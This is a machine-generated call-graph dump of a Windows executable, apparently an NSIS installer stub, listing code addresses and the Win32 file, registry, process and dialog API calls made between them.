LoadLibraryExA 2914->2916 2915->2916 2918 401faf GetProcAddress 2915->2918 2916->2909 2916->2918 2919 401ffb 2918->2919 2920 401fbe 2918->2920 2921 404e89 25 API calls 2919->2921 2923 401fce 2920->2923 2931 401423 2920->2931 2921->2923 2923->2917 2924 40201c FreeLibrary 2923->2924 2924->2917 2926 402a13 2925->2926 2927 405b9e 18 API calls 2926->2927 2928 402a34 2927->2928 2929 401f81 2928->2929 2930 405de7 5 API calls 2928->2930 2929->2913 2930->2929 2932 404e89 25 API calls 2931->2932 2933 401431 2932->2933 2933->2923 3076 4030ef #17 SetErrorMode OleInitialize 3077 405ea7 3 API calls 3076->3077 3078 403134 SHGetFileInfoA 3077->3078 3149 405b7c lstrcpynA 3078->3149 3080 40315f GetCommandLineA 3150 405b7c lstrcpynA 3080->3150 3082 403171 GetModuleHandleA 3083 403188 3082->3083 3084 405654 CharNextA 3083->3084 3085 40319c CharNextA 3084->3085 3093 4031ac 3085->3093 3086 403276 3087 403289 GetTempPathA 3086->3087 3151 4030bb 3087->3151 3089 4032a1 3090 4032a5 GetWindowsDirectoryA lstrcatA 3089->3090 3091 4032fb DeleteFileA 3089->3091 3094 4030bb 11 API calls 3090->3094 3159 402c33 GetTickCount GetModuleFileNameA 3091->3159 3092 405654 CharNextA 3092->3093 3093->3086 3093->3092 3097 403278 3093->3097 3096 4032c1 3094->3096 3096->3091 3100 4032c5 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3096->3100 3241 405b7c lstrcpynA 3097->3241 3098 40330f 3101 4033a9 ExitProcess CoUninitialize 3098->3101 3106 405654 CharNextA 3098->3106 3137 403395 3098->3137 3104 4030bb 11 API calls 3100->3104 3102 4034b2 3101->3102 3103 4033be 3101->3103 3109 403535 ExitProcess 3102->3109 3113 405ea7 3 API calls 3102->3113 3244 4053ad 3103->3244 3108 4032f3 3104->3108 3116 40332a 3106->3116 3108->3091 3108->3101 3110 4033a5 3110->3101 3114 4034c1 3113->3114 3115 405ea7 3 API calls 3114->3115 3119 4034ca 3115->3119 3117 403370 3116->3117 3118 4033d4 lstrcatA lstrcmpiA 3116->3118 3121 405717 18 API calls 3117->3121 3118->3101 3120 4033f0 CreateDirectoryA SetCurrentDirectoryA 3118->3120 3122 405ea7 3 API calls 3119->3122 3123 403412 3120->3123 3124 403407 3120->3124 3125 40337b 3121->3125 3126 4034d3 3122->3126 3249 405b7c lstrcpynA 3123->3249 3248 405b7c lstrcpynA 3124->3248 3125->3101 3242 405b7c lstrcpynA 3125->3242 3129 403521 ExitWindowsEx 3126->3129 3134 4034e1 GetCurrentProcess 3126->3134 3129->3109 3132 40352e 3129->3132 3131 40338a 3243 405b7c lstrcpynA 3131->3243 3253 40140b 3132->3253 3140 4034f1 3134->3140 3136 405b9e 18 API calls 3138 403451 DeleteFileA 3136->3138 3187 403627 3137->3187 3139 40345e CopyFileA 3138->3139 3146 403420 3138->3146 3139->3146 3140->3129 3141 4034a6 3143 405a30 40 API calls 3141->3143 3142 405a30 40 API calls 3142->3146 3144 4034ad 3143->3144 3144->3101 3145 405b9e 18 API calls 3145->3146 3146->3136 3146->3141 3146->3142 3146->3145 3148 403492 CloseHandle 3146->3148 3250 40534c CreateProcessA 3146->3250 3148->3146 3149->3080 3150->3082 3152 405de7 5 API calls 3151->3152 3154 4030c7 3152->3154 3153 4030d1 3153->3089 3154->3153 3155 405629 3 API calls 3154->3155 3156 4030d9 CreateDirectoryA 3155->3156 3157 405859 2 API calls 3156->3157 3158 4030ed 3157->3158 3158->3089 3256 40582a GetFileAttributesA CreateFileA 3159->3256 3161 402c73 3180 402c83 3161->3180 3257 405b7c lstrcpynA 3161->3257 3163 402c99 3164 405670 2 API calls 3163->3164 3165 402c9f 3164->3165 3258 405b7c lstrcpynA 3165->3258 3167 402caa GetFileSize 3168 402cc1 3167->3168 3184 402da6 3167->3184 3175 402e12 3168->3175 3168->3180 3182 402bcf 6 API calls 3168->3182 3168->3184 3259 403072 ReadFile 3168->3259 3170 402daf 3172 402ddf GlobalAlloc 3170->3172 3170->3180 3272 4030a4 SetFilePointer 3170->3272 3273 4030a4 SetFilePointer 3172->3273 3177 402bcf 6 API calls 3175->3177 3176 402dfa 3274 402e6c 3176->3274 3177->3180 3178 402dc8 3181 403072 ReadFile 3178->3181 3180->3098 3183 402dd3 3181->3183 3182->3168 3183->3172 3183->3180 3261 402bcf 3184->3261 3185 402e06 3185->3180 3185->3185 3186 402e43 SetFilePointer 3185->3186 3186->3180 3188 405ea7 3 API calls 3187->3188 3189 40363b 3188->3189 3190 403641 3189->3190 3191 403653 3189->3191 3310 405ada wsprintfA 3190->3310 3192 405a63 3 API calls 3191->3192 3193 40367e 3192->3193 3194 40369c lstrcatA 3193->3194 3196 405a63 3 API calls 3193->3196 3197 403651 3194->3197 3196->3194 3301 4038ec 3197->3301 3200 405717 18 API calls 3201 4036ce 3200->3201 3202 403757 3201->3202 3204 405a63 3 API calls 3201->3204 3203 405717 18 API calls 3202->3203 3205 40375d 3203->3205 3206 4036fa 3204->3206 3207 40376d LoadImageA 3205->3207 3210 405b9e 18 API calls 3205->3210 3206->3202 3214 403716 lstrlenA 3206->3214 3218 405654 CharNextA 3206->3218 3208 403813 3207->3208 3209 403794 RegisterClassA 3207->3209 3213 40140b 2 API calls 3208->3213 3211 40381d 3209->3211 3212 4037ca SystemParametersInfoA CreateWindowExA 3209->3212 3210->3207 3211->3110 3212->3208 3217 403819 3213->3217 3215 403724 lstrcmpiA 3214->3215 3216 40374a 3214->3216 3215->3216 3220 403734 GetFileAttributesA 3215->3220 3221 405629 3 API calls 3216->3221 3217->3211 3223 4038ec 19 API calls 3217->3223 3219 403714 3218->3219 3219->3214 3222 403740 3220->3222 3224 403750 3221->3224 3222->3216 3225 405670 2 API calls 3222->3225 3226 40382a 3223->3226 3311 405b7c lstrcpynA 3224->3311 3225->3216 3228 403836 ShowWindow LoadLibraryA 3226->3228 3229 4038b9 3226->3229 3231 403855 LoadLibraryA 3228->3231 3232 40385c GetClassInfoA 3228->3232 3230 404f5b 5 API calls 3229->3230 3233 4038bf 3230->3233 3231->3232 3234 403870 GetClassInfoA RegisterClassA 3232->3234 3235 403886 DialogBoxParamA 3232->3235 3236 4038c3 3233->3236 3237 4038db 3233->3237 3234->3235 3238 40140b 2 API calls 3235->3238 3236->3211 3240 40140b 2 API calls 3236->3240 3239 40140b 2 API calls 3237->3239 3238->3211 3239->3211 3240->3211 3241->3087 3242->3131 3243->3137 3245 4053c2 3244->3245 3246 4033cc ExitProcess 3245->3246 3247 4053d6 MessageBoxIndirectA 3245->3247 3247->3246 3248->3123 3249->3146 3251 405387 3250->3251 3252 40537b CloseHandle 3250->3252 3251->3146 3252->3251 3254 401389 2 API calls 3253->3254 3255 401420 3254->3255 3255->3109 3256->3161 3257->3163 3258->3167 3260 403093 3259->3260 3260->3168 3262 402bf0 3261->3262 3263 402bd8 3261->3263 3264 402c00 GetTickCount 3262->3264 3265 402bf8 3262->3265 3266 402be1 DestroyWindow 3263->3266 3267 402be8 3263->3267 3269 402c31 3264->3269 3270 402c0e CreateDialogParamA ShowWindow 3264->3270 3296 405ee0 3265->3296 3266->3267 3267->3170 3269->3170 3270->3269 3272->3178 3273->3176 3276 402e84 3274->3276 3275 402eb1 3278 403072 ReadFile 3275->3278 3276->3275 3300 4030a4 SetFilePointer 3276->3300 3279 402ebc 3278->3279 3280 403001 3279->3280 3281 402ece GetTickCount 3279->3281 3283 402fec 3279->3283 3282 40304d 3280->3282 3287 403005 3280->3287 3281->3283 3293 402ef7 3281->3293 3284 403072 ReadFile 3282->3284 3283->3185 3284->3283 3285 403072 ReadFile 3285->3293 3286 403072 ReadFile 3286->3287 3287->3283 3287->3286 3288 403025 WriteFile 3287->3288 3288->3283 3289 40303a 3288->3289 3289->3283 3289->3287 3291 40304b 3289->3291 3290 402f4d GetTickCount 3290->3293 3291->3283 3292 402f76 MulDiv wsprintfA 3294 404e89 25 API calls 3292->3294 3293->3283 3293->3285 3293->3290 3293->3292 3295 402fb4 WriteFile 3293->3295 3294->3293 3295->3283 3295->3293 3297 405efd PeekMessageA 3296->3297 3298 405ef3 DispatchMessageA 3297->3298 3299 402bfe 3297->3299 3298->3297 3299->3170 3300->3275 3302 403900 3301->3302 3312 405ada wsprintfA 3302->3312 3304 403971 3305 405b9e 18 API calls 3304->3305 3306 40397d SetWindowTextA 3305->3306 3307 4036ac 3306->3307 3308 403999 3306->3308 3307->3200 3308->3307 3309 405b9e 18 API calls 3308->3309 3309->3308 3310->3197 3311->3202 3312->3304 3759 4014f0 SetForegroundWindow 3760 40289c 3759->3760 3761 401af0 3762 402a07 18 API calls 3761->3762 3763 401af7 3762->3763 3764 4029ea 18 API calls 3763->3764 3765 401b00 wsprintfA 3764->3765 3766 40289c 3765->3766 3767 4019f1 3768 402a07 18 API calls 3767->3768 3769 4019fa ExpandEnvironmentStringsA 3768->3769 3770 401a0e 3769->3770 3772 401a21 3769->3772 3771 401a13 lstrcmpA 3770->3771 3770->3772 3771->3772 3773 402877 SendMessageA 3774 402891 InvalidateRect 3773->3774 3775 40289c 3773->3775 3774->3775 3776 401c78 3777 4029ea 18 API calls 3776->3777 3778 401c7e IsWindow 3777->3778 3779 4019e1 3778->3779 3479 40227d 3480 402a07 18 API calls 3479->3480 3481 40228e 3480->3481 3482 402a07 18 API calls 3481->3482 3483 402297 3482->3483 3484 402a07 18 API calls 3483->3484 3485 4022a1 GetPrivateProfileStringA 3484->3485 3780 404dfd 3781 404e21 3780->3781 3782 404e0d 3780->3782 3785 404e29 IsWindowVisible 3781->3785 3791 404e40 3781->3791 3783 404e13 3782->3783 3784 404e6a 3782->3784 3787 403ed8 SendMessageA 3783->3787 3786 404e6f CallWindowProcA 3784->3786 3785->3784 3788 404e36 3785->3788 3789 404e1d 3786->3789 3787->3789 3793 404754 SendMessageA 3788->3793 3791->3786 3798 4047d4 3791->3798 3794 4047b3 SendMessageA 3793->3794 3795 404777 GetMessagePos ScreenToClient SendMessageA 3793->3795 3796 4047ab 3794->3796 3795->3796 3797 4047b0 3795->3797 3796->3791 3797->3794 3807 405b7c lstrcpynA 3798->3807 3800 4047e7 3808 405ada wsprintfA 3800->3808 3802 4047f1 3803 40140b 2 API calls 3802->3803 3804 4047fa 3803->3804 3809 405b7c lstrcpynA 3804->3809 3806 404801 3806->3784 3807->3800 3808->3802 3809->3806 3810 4014fe 3811 401506 3810->3811 3813 401519 3810->3813 3812 4029ea 18 API calls 3811->3812 3812->3813 3814 401000 3815 401037 BeginPaint GetClientRect 3814->3815 3816 40100c DefWindowProcA 3814->3816 3818 4010f3 3815->3818 3819 401179 3816->3819 3820 401073 CreateBrushIndirect FillRect DeleteObject 3818->3820 3821 4010fc 3818->3821 3820->3818 3822 401102 CreateFontIndirectA 3821->3822 3823 401167 EndPaint 3821->3823 3822->3823 3824 401112 6 API calls 3822->3824 3823->3819 3824->3823 3825 404283 3826 404293 3825->3826 3827 4042b9 3825->3827 3829 403e8c 19 API calls 3826->3829 3828 403ef3 8 API calls 3827->3828 3831 4042c5 3828->3831 3830 4042a0 SetDlgItemTextA 3829->3830 3830->3827 3832 401705 3833 402a07 18 API calls 3832->3833 3834 40170c SearchPathA 3833->3834 3835 401727 3834->3835 3836 404806 GetDlgItem GetDlgItem 3837 404858 7 API calls 3836->3837 3845 404a70 3836->3845 3838 4048fb DeleteObject 3837->3838 3839 4048ee SendMessageA 3837->3839 3840 404904 3838->3840 3839->3838 3841 40493b 3840->3841 3844 405b9e 18 API calls 3840->3844 3846 403e8c 19 API calls 3841->3846 3842 404c00 3848 404c12 3842->3848 3849 404c0a SendMessageA 3842->3849 3843 404b54 3843->3842 3852 404bad SendMessageA 3843->3852 3879 404a63 3843->3879 3850 40491d SendMessageA SendMessageA 3844->3850 3845->3843 3855 404754 5 API calls 3845->3855 3867 404ae1 3845->3867 3847 40494f 3846->3847 3851 403e8c 19 API calls 3847->3851 3859 404c24 ImageList_Destroy 3848->3859 3860 404c2b 3848->3860 3864 404c3b 3848->3864 3849->3848 3850->3840 3868 40495d 3851->3868 3857 404bc2 SendMessageA 3852->3857 3852->3879 3853 403ef3 8 API calls 3858 404df6 3853->3858 3854 404b46 SendMessageA 3854->3843 3855->3867 3856 404daa 3865 404dbc ShowWindow GetDlgItem ShowWindow 3856->3865 3856->3879 3863 404bd5 3857->3863 3859->3860 3861 404c34 GlobalFree 3860->3861 3860->3864 3861->3864 3862 404a31 GetWindowLongA SetWindowLongA 3866 404a4a 3862->3866 3873 404be6 SendMessageA 3863->3873 3864->3856 3878 4047d4 4 API calls 3864->3878 3883 404c76 3864->3883 3865->3879 3869 404a50 ShowWindow 3866->3869 3870 404a68 3866->3870 3867->3843 3867->3854 3868->3862 3872 4049ac SendMessageA 3868->3872 3874 404a2b 3868->3874 3876 4049e8 SendMessageA 3868->3876 3877 4049f9 SendMessageA 3868->3877 3887 403ec1 SendMessageA 3869->3887 3888 403ec1 SendMessageA 3870->3888 3872->3868 3873->3842 3874->3862 3874->3866 3876->3868 3877->3868 3878->3883 3879->3853 3880 404d80 InvalidateRect 3880->3856 3881 404d96 3880->3881 3884 404672 21 API calls 3881->3884 3882 404ca4 SendMessageA 3886 404cba 3882->3886 3883->3882 3883->3886 3884->3856 3885 404d2e SendMessageA SendMessageA 3885->3886 3886->3880 3886->3885 3887->3879 3888->3845 3889 402188 3890 402a07 18 API calls 3889->3890 3891 40218e 3890->3891 3892 402a07 18 API calls 3891->3892 3893 402197 3892->3893 3894 402a07 18 API calls 3893->3894 3895 4021a0 3894->3895 3896 405e80 2 API calls 3895->3896 3897 4021a9 3896->3897 3898 4021ba lstrlenA lstrlenA 3897->3898 3899 4021ad 3897->3899 3901 404e89 25 API calls 3898->3901 3900 404e89 25 API calls 3899->3900 3903 4021b5 3899->3903 3900->3903 3902 4021f6 SHFileOperationA 3901->3902 3902->3899 3902->3903 3904 40220a 3905 402211 3904->3905 3906 402224 3904->3906 3907 405b9e 18 API calls 3905->3907 3908 40221e 3907->3908 3909 4053ad MessageBoxIndirectA 3908->3909 3909->3906 3910 40260c 3911 402613 3910->3911 3912 40289c 3910->3912 3913 402619 FindClose 3911->3913 3913->3912 3914 40460c 3915 404638 3914->3915 3916 40461c 3914->3916 3918 40466b 3915->3918 3919 40463e SHGetPathFromIDListA 3915->3919 3925 405391 GetDlgItemTextA 3916->3925 3921 404655 SendMessageA 3919->3921 3922 40464e 3919->3922 3920 404629 SendMessageA 3920->3915 3921->3918 3923 40140b 2 API calls 3922->3923 3923->3921 3925->3920 3926 40268d 3927 402a07 18 API calls 3926->3927 3929 40269b 3927->3929 3928 4026b1 3931 405805 2 API calls 3928->3931 3929->3928 3930 402a07 18 API calls 3929->3930 3930->3928 3932 4026b7 3931->3932 3952 40582a GetFileAttributesA CreateFileA 3932->3952 3934 4026c4 3935 4026d0 GlobalAlloc 3934->3935 3936 40276d 3934->3936 3937 402764 CloseHandle 3935->3937 3938 4026e9 3935->3938 3939 402775 DeleteFileA 3936->3939 3940 402788 3936->3940 3937->3936 3953 4030a4 SetFilePointer 3938->3953 3939->3940 3942 4026ef 3943 403072 ReadFile 3942->3943 3944 4026f8 GlobalAlloc 3943->3944 3945 402708 3944->3945 3946 40273c WriteFile GlobalFree 3944->3946 3948 402e6c 33 API calls 3945->3948 3947 402e6c 33 API calls 3946->3947 3949 402761 3947->3949 3951 402715 3948->3951 3949->3937 3950 402733 GlobalFree 3950->3946 3951->3950 3952->3934 3953->3942 3954 40278e 3955 4029ea 18 API calls 3954->3955 3956 402794 3955->3956 3957 4027b8 3956->3957 3958 4027cf 3956->3958 3962 40266d 3956->3962 3961 4027cc 3957->3961 3965 4027bd 3957->3965 3959 4027e5 3958->3959 3960 4027d9 3958->3960 3964 405b9e 18 API calls 3959->3964 3963 4029ea 18 API calls 3960->3963 3961->3962 3969 405ada wsprintfA 3961->3969 3963->3961 3964->3961 3968 405b7c lstrcpynA 3965->3968 3968->3962 3969->3962 3970 401490 3971 404e89 25 API calls 3970->3971 3972 401497 3971->3972 3973 401b11 3974 401b62 3973->3974 3975 401b1e 3973->3975 3976 401b66 3974->3976 3977 401b8b GlobalAlloc 3974->3977 3978 401ba6 3975->3978 3981 401b35 3975->3981 3991 402224 3976->3991 3994 405b7c lstrcpynA 3976->3994 3980 405b9e 18 API calls 3977->3980 3979 405b9e 18 API calls 3978->3979 3978->3991 3982 40221e 3979->3982 3980->3978 3992 405b7c lstrcpynA 3981->3992 3987 4053ad MessageBoxIndirectA 3982->3987 3985 401b78 GlobalFree 3985->3991 3986 401b44 3993 405b7c lstrcpynA 3986->3993 3987->3991 3989 401b53 3995 405b7c lstrcpynA 3989->3995 3992->3986 3993->3989 3994->3985 3995->3991 3996 402814 3997 4029ea 18 API calls 3996->3997 3998 40281a 3997->3998 3999 40284b 3998->3999 4000 40266d 3998->4000 4002 402828 3998->4002 3999->4000 4001 405b9e 18 API calls 3999->4001 4001->4000 4002->4000 4004 405ada wsprintfA 4002->4004 4004->4000 3349 401595 3350 402a07 18 API calls 3349->3350 3351 40159c SetFileAttributesA 3350->3351 3352 4015ae 3351->3352 4005 401c95 4006 4029ea 18 API calls 4005->4006 4007 401c9c 4006->4007 4008 4029ea 18 API calls 4007->4008 4009 401ca4 GetDlgItem 4008->4009 4010 4024c9 4009->4010 4011 402517 4012 4029ea 18 API calls 4011->4012 4015 402521 4012->4015 4013 402597 4014 402555 ReadFile 4014->4013 4014->4015 4015->4013 4015->4014 4016 402599 4015->4016 4017 4025a9 4015->4017 4020 405ada wsprintfA 4016->4020 4017->4013 4019 4025bf SetFilePointer 4017->4019 4019->4013 4020->4013 4021 40231a 4022 402320 4021->4022 4023 402a07 18 API calls 4022->4023 4024 402332 4023->4024 4025 402a07 18 API calls 4024->4025 4026 40233c RegCreateKeyExA 4025->4026 4027 402366 4026->4027 4028 40289c 4026->4028 4029 40237e 4027->4029 4030 402a07 18 API calls 4027->4030 4032 4029ea 18 API calls 4029->4032 4034 40238a 4029->4034 4031 402377 lstrlenA 4030->4031 4031->4029 4032->4034 4033 4023a5 RegSetValueExA 4036 4023bb RegCloseKey 4033->4036 4034->4033 4035 402e6c 33 API calls 4034->4035 4035->4033 4036->4028 4038 403fa0 lstrcpynA lstrlenA 4039 4016a1 4040 402a07 18 API calls 4039->4040 4041 4016a7 GetFullPathNameA 4040->4041 4042 4016be 4041->4042 4048 4016df 4041->4048 4045 405e80 2 API calls 4042->4045 4042->4048 4043 4016f3 GetShortPathNameA 4044 40289c 4043->4044 4046 4016cf 4045->4046 4046->4048 4049 405b7c lstrcpynA 4046->4049 4048->4043 4048->4044 4049->4048 4050 401d26 GetDC GetDeviceCaps 4051 4029ea 18 API calls 4050->4051 4052 401d44 MulDiv ReleaseDC 4051->4052 4053 4029ea 18 API calls 4052->4053 4054 401d63 4053->4054 4055 405b9e 18 API calls 4054->4055 4056 401d9c CreateFontIndirectA 4055->4056 4057 4024c9 4056->4057 4058 402626 4059 402629 4058->4059 4061 402641 4058->4061 4060 402636 FindNextFileA 4059->4060 4060->4061 4062 402680 4060->4062 4064 405b7c lstrcpynA 4062->4064 4064->4061 2934 40172c 2935 402a07 18 API calls 2934->2935 2936 401733 2935->2936 2940 405859 2936->2940 2938 40173a 2939 405859 2 API calls 2938->2939 2939->2938 2941 405864 GetTickCount GetTempFileNameA 2940->2941 2942 405891 2941->2942 2943 405895 2941->2943 2942->2941 2942->2943 2943->2938 4065 401dac 4066 4029ea 18 API calls 4065->4066 4067 401db2 4066->4067 4068 4029ea 18 API calls 4067->4068 4069 401dbb 4068->4069 4070 401dc2 ShowWindow 4069->4070 4071 401dcd EnableWindow 4069->4071 4072 40289c 4070->4072 4071->4072 4073 401eac 4074 402a07 18 API calls 4073->4074 4075 401eb3 4074->4075 4076 405e80 2 API calls 4075->4076 4077 401eb9 4076->4077 4079 401ecb 4077->4079 4080 405ada wsprintfA 4077->4080 4080->4079 4081 40192d 4082 402a07 18 API calls 4081->4082 4083 401934 lstrlenA 4082->4083 4084 4024c9 4083->4084 4085 4024ad 4086 402a07 18 API calls 4085->4086 4087 4024b4 4086->4087 4090 40582a GetFileAttributesA CreateFileA 4087->4090 4089 4024c0 4090->4089 4091 401cb0 4092 4029ea 18 API calls 4091->4092 4093 401cc0 SetWindowLongA 4092->4093 4094 40289c 4093->4094 4095 401a31 4096 4029ea 18 API calls 4095->4096 4097 401a37 4096->4097 4098 4029ea 18 API calls 4097->4098 4099 4019e1 4098->4099 3313 401e32 3314 402a07 18 API calls 3313->3314 3315 401e38 3314->3315 3316 404e89 25 API calls 3315->3316 3317 401e42 3316->3317 3318 40534c 2 API calls 3317->3318 3322 401e48 3318->3322 3319 401e9e CloseHandle 3321 40266d 3319->3321 3320 401e67 WaitForSingleObject 3320->3322 3323 401e75 GetExitCodeProcess 3320->3323 3322->3319 3322->3320 3322->3321 3324 405ee0 2 API calls 3322->3324 3325 401e92 3323->3325 3326 401e87 3323->3326 3324->3320 3325->3319 3328 401e90 3325->3328 3329 405ada wsprintfA 3326->3329 3328->3319 3329->3328 3330 4015b3 3331 402a07 18 API calls 3330->3331 3332 4015ba 3331->3332 3333 4056c2 4 API calls 3332->3333 3334 4015c2 3333->3334 3335 40160a 3334->3335 3336 405654 CharNextA 3334->3336 3337 401638 3335->3337 3338 40160f 3335->3338 3340 4015d0 CreateDirectoryA 3336->3340 3342 401423 25 API calls 3337->3342 3339 401423 25 API calls 3338->3339 3341 401616 3339->3341 3340->3334 3343 4015e5 GetLastError 3340->3343 3348 405b7c lstrcpynA 3341->3348 3347 401630 3342->3347 3343->3334 3345 4015f2 GetFileAttributesA 3343->3345 3345->3334 3346 401621 SetCurrentDirectoryA 3346->3347 3348->3346 4100 402036 4101 402a07 18 API calls 4100->4101 4102 40203d 4101->4102 4103 402a07 18 API calls 4102->4103 4104 402047 4103->4104 4105 402a07 18 API calls 4104->4105 4106 402050 4105->4106 4107 402a07 18 API calls 4106->4107 4108 40205a 4107->4108 4109 402a07 18 API calls 4108->4109 4110 402064 4109->4110 4111 402078 CoCreateInstance 4110->4111 4112 402a07 18 API calls 4110->4112 4113 40214d 4111->4113 4114 402097 4111->4114 4112->4111 4115 401423 25 API calls 4113->4115 4116 40217f 4113->4116 4114->4113 4117 40212c MultiByteToWideChar 4114->4117 4115->4116 4117->4113 4118 4014b7 4119 4014bd 4118->4119 4120 401389 2 API calls 4119->4120 4121 4014c5 4120->4121 3371 401bb8 3393 4029ea 3371->3393 3373 401bbf 3374 4029ea 18 API calls 3373->3374 3375 401bc9 3374->3375 3376 401bd9 3375->3376 3377 402a07 18 API calls 3375->3377 3378 402a07 18 API calls 3376->3378 3382 401be9 3376->3382 3377->3376 3378->3382 3379 401bf4 3383 4029ea 18 API calls 3379->3383 3380 401c38 3381 402a07 18 API calls 3380->3381 3384 401c3d 3381->3384 3382->3379 3382->3380 3385 401bf9 3383->3385 3386 402a07 18 API calls 3384->3386 3387 4029ea 18 API calls 3385->3387 3388 401c46 FindWindowExA 3386->3388 3389 401c02 3387->3389 3392 401c64 3388->3392 3390 401c28 SendMessageA 3389->3390 3391 401c0a SendMessageTimeoutA 3389->3391 3390->3392 3391->3392 3394 405b9e 18 API calls 3393->3394 3395 4029fe 3394->3395 3395->3373 4122 402438 4123 402b11 19 API calls 4122->4123 4124 402442 4123->4124 4125 4029ea 18 API calls 4124->4125 4126 40244b 4125->4126 4127 402462 RegEnumKeyA 4126->4127 4128 40246e RegEnumValueA 4126->4128 4130 40266d 4126->4130 4129 402487 RegCloseKey 4127->4129 4128->4129 4128->4130 4129->4130 3396 4039b9 3397 4039d1 3396->3397 3398 403b0c 3396->3398 3397->3398 3399 4039dd 3397->3399 3400 403b5d 3398->3400 3401 403b1d GetDlgItem GetDlgItem 3398->3401 3403 4039e8 SetWindowPos 3399->3403 3404 4039fb 3399->3404 3402 403bb7 3400->3402 3410 401389 2 API calls 3400->3410 3405 403e8c 19 API calls 3401->3405 3406 403ed8 SendMessageA 3402->3406 3427 403b07 3402->3427 3403->3404 3407 403a00 ShowWindow 3404->3407 3408 403a18 3404->3408 3409 403b47 SetClassLongA 3405->3409 3425 403bc9 3406->3425 3407->3408 3411 403a20 DestroyWindow 3408->3411 3412 403a3a 3408->3412 3413 40140b 2 API calls 3409->3413 3416 403b8f 3410->3416 3465 403e15 3411->3465 3414 403a50 3412->3414 3415 403a3f SetWindowLongA 3412->3415 3413->3400 3417 403af9 3414->3417 3418 403a5c GetDlgItem 3414->3418 3415->3427 3416->3402 3419 403b93 SendMessageA 3416->3419 3423 403ef3 8 API calls 3417->3423 3422 403a6f SendMessageA IsWindowEnabled 3418->3422 3429 403a8c 3418->3429 3419->3427 3420 40140b 2 API calls 3420->3425 3421 403e17 DestroyWindow KiUserCallbackDispatcher 3421->3465 3422->3427 3422->3429 3423->3427 3424 403e46 ShowWindow 3424->3427 3425->3420 3425->3421 3426 405b9e 18 API calls 3425->3426 3425->3427 3432 403e8c 19 API calls 3425->3432 3441 403e8c 19 API calls 3425->3441 3456 403d57 DestroyWindow 3425->3456 3426->3425 3428 403a91 3431 403e65 SendMessageA 3428->3431 3429->3428 3430 403a99 3429->3430 3433 403ae0 SendMessageA 3429->3433 3434 403aac 3429->3434 3430->3428 3430->3433 3435 403ac7 3431->3435 3432->3425 3433->3417 3436 403ab4 3434->3436 3437 403ac9 3434->3437 3435->3417 3439 40140b 2 API calls 3436->3439 3438 40140b 2 API calls 3437->3438 3440 403ad0 3438->3440 3439->3428 3440->3417 3440->3428 3442 403c44 GetDlgItem 3441->3442 3443 403c61 ShowWindow KiUserCallbackDispatcher 3442->3443 3444 403c59 3442->3444 3466 403eae KiUserCallbackDispatcher 3443->3466 3444->3443 3446 403c8b EnableWindow 3449 403c9f 3446->3449 3447 403ca4 GetSystemMenu EnableMenuItem SendMessageA 3448 403cd4 SendMessageA 3447->3448 3447->3449 3448->3449 3449->3447 3467 403ec1 SendMessageA 3449->3467 3468 405b7c lstrcpynA 3449->3468 3452 403d02 lstrlenA 3453 405b9e 18 API calls 3452->3453 3454 403d13 SetWindowTextA 3453->3454 3455 401389 2 API calls 3454->3455 3455->3425 3457 403d71 CreateDialogParamA 3456->3457 3456->3465 3458 403da4 3457->3458 3457->3465 3459 403e8c 19 API calls 3458->3459 3460 403daf GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3459->3460 3461 401389 2 API calls 3460->3461 3462 403df5 3461->3462 3462->3427 3463 403dfd ShowWindow 3462->3463 3464 403ed8 SendMessageA 3463->3464 3464->3465 3465->3424 3465->3427 3466->3446 3467->3449 3468->3452 3469 402239 3470 402241 3469->3470 3472 402247 3469->3472 3471 402a07 18 API calls 3470->3471 3471->3472 3473 402a07 18 API calls 3472->3473 3475 402257 3472->3475 3473->3475 3474 402265 3477 402a07 18 API calls 3474->3477 3475->3474 3476 402a07 18 API calls 3475->3476 3476->3474 3478 40226e WritePrivateProfileStringA 3477->3478 4132 4022be 4133 4022c3 4132->4133 4134 4022ee 4132->4134 4136 402b11 19 API calls 4133->4136 4135 402a07 18 API calls 4134->4135 4137 4022f5 4135->4137 4138 4022ca 4136->4138 4143 402a47 RegOpenKeyExA 4137->4143 4139 402a07 18 API calls 4138->4139 4142 40230b 4138->4142 4140 4022db RegDeleteValueA RegCloseKey 4139->4140 4140->4142 4146 402a72 4143->4146 4151 402abe 4143->4151 4144 402a98 RegEnumKeyA 4145 402aaa RegCloseKey 4144->4145 4144->4146 4148 405ea7 3 API calls 4145->4148 4146->4144 4146->4145 4147 402acf RegCloseKey 4146->4147 4149 402a47 3 API calls 4146->4149 4147->4151 4150 402aba 4148->4150 4149->4146 4150->4151 4152 402aea RegDeleteKeyA 4150->4152 4151->4142 4152->4151 3486 40173f 3487 402a07 18 API calls 3486->3487 3488 401746 3487->3488 3489 401764 3488->3489 3490 40176c 3488->3490 3525 405b7c lstrcpynA 3489->3525 3526 405b7c lstrcpynA 3490->3526 3493 40176a 3497 405de7 5 API calls 3493->3497 3494 401777 3495 405629 3 API calls 3494->3495 3496 40177d lstrcatA 3495->3496 3496->3493 3514 401789 3497->3514 3498 405e80 2 API calls 3498->3514 3499 405805 2 API calls 3499->3514 3501 4017a0 CompareFileTime 3501->3514 3502 401864 3503 404e89 25 API calls 3502->3503 3505 40186e 3503->3505 3504 40183b 3506 404e89 25 API calls 3504->3506 3513 401850 3504->3513 3507 402e6c 33 API calls 3505->3507 3506->3513 3509 401881 3507->3509 3508 405b7c lstrcpynA 3508->3514 3510 401895 SetFileTime 3509->3510 3512 4018a7 CloseHandle 3509->3512 3510->3512 3511 405b9e 18 API calls 3511->3514 3512->3513 3515 4018b8 3512->3515 3514->3498 3514->3499 3514->3501 3514->3502 3514->3504 3514->3508 3514->3511 3520 4053ad MessageBoxIndirectA 3514->3520 3524 40582a GetFileAttributesA CreateFileA 3514->3524 3516 4018d0 3515->3516 3517 4018bd 3515->3517 3519 405b9e 18 API calls 3516->3519 3518 405b9e 18 API calls 3517->3518 3521 4018c5 lstrcatA 3518->3521 3522 4018d8 3519->3522 3520->3514 3521->3522 3523 4053ad MessageBoxIndirectA 3522->3523 3523->3513 3524->3514 3525->3493 3526->3494 4153 40163f 4154 402a07 18 API calls 4153->4154 4155 401645 4154->4155 4156 405e80 2 API calls 4155->4156 4157 40164b 4156->4157 4158 40193f 4159 4029ea 18 API calls 4158->4159 4160 401946 4159->4160 4161 4029ea 18 API calls 4160->4161 4162 401950 4161->4162 4163 402a07 18 API calls 4162->4163 4164 401959 4163->4164 4165 40196c lstrlenA 4164->4165 4167 4019a7 4164->4167 4166 401976 4165->4166 4166->4167 4171 405b7c lstrcpynA 4166->4171 4169 401990 